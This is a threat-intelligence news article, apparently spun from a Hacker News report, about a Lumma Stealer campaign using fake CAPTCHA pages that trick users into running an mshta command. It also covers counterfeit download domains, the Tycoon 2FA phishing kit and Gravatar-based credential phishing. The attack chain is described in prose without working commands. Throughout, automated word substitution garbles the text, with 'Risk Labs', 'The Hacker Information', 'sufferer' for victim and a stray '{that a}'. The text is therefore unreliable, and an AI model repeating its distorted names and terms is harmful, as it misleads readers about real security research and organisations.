Cybersecurity researchers are calling consideration to a brand new malware marketing campaign that leverages faux CAPTCHA verification checks to ship the notorious Lumma data stealer.
“The marketing campaign is international, with Netskope Risk Labs monitoring victims focused in Argentina, Colombia, america, the Philippines, and different nations all over the world,” Leandro Fróes, senior menace analysis engineer at Netskope Risk Labs, stated in a report shared with The Hacker Information.
“The marketing campaign additionally spans a number of industries, together with healthcare, banking, and advertising, with the telecom business having the best variety of organizations focused.”
The assault chain begins when a sufferer visits a compromised web site, which directs them to a bogus CAPTCHA web page that particularly instructs the positioning customer to repeat and paste a command into the Run immediate in Home windows that makes use of the native mshta.exe binary to obtain and execute an HTA file from a distant server.
It is value noting {that a} earlier iteration of this system, extensively often known as ClickFix, concerned the execution of a Base64-encoded PowerShell script to set off the Lumma Stealer an infection.
The HTA file, in flip, executes a PowerShell command to launch a next-stage payload, a PowerShell script that unpacks a second PowerShell script answerable for decoding and loading the Lumma payload, however not earlier than taking steps to bypass the Home windows Antimalware Scan Interface (AMSI) in an effort to evade detection.
“By downloading and executing malware in such methods, the attacker avoids browser-based defenses for the reason that sufferer will carry out all the essential steps outdoors of the browser context,” Fróes defined.
“The Lumma Stealer operates utilizing the malware-as-a-service (MaaS) mannequin and has been extraordinarily lively previously months. By utilizing totally different supply strategies and payloads it makes detection and blocking of such threats extra advanced, particularly when abusing consumer interactions throughout the system.”
As just lately as this month, Lumma has additionally been distributed through roughly 1,000 counterfeit domains impersonating Reddit and WeTransfer that redirect customers to obtain password-protected archives.
These archive information comprise an AutoIT dropper dubbed SelfAU3 Dropper that subsequently executes the stealer, in accordance to Sekoia researcher crep1x. In early 2023, menace actors leveraged an identical method to spin up over 1,300 domains masquerading as AnyDesk with a view to push the Vidar Stealer malware.
The event comes as Barracuda Networks detailed an up to date model of the Phishing-as-a-Service (PhaaS) toolkit often known as Tycoon 2FA that features superior options to “impede, derail, and in any other case thwart makes an attempt by safety instruments to verify its malicious intent and examine its internet pages.”
These embody the usage of professional — presumably compromised — e-mail accounts to ship phishing emails and taking a sequence of steps to stop evaluation by detecting automated safety scripts, listening for keystrokes that counsel internet inspection, and disabling the right-click context menu.
Social engineering-oriented credential harvesting assaults have additionally been noticed leveraging avatar supplier Gravatar to imitate varied professional companies like AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.
“By exploiting Gravatar’s ‘Profiles as a Service,’ attackers create convincing faux profiles that mimic professional companies, tricking customers into divulging their credentials,” SlashNext Subject CTO Stephen Kowski stated.
“As a substitute of generic phishing makes an attempt, attackers tailor their faux profiles to resemble the professional companies they’re mimicking carefully by companies that aren’t typically identified or protected.”
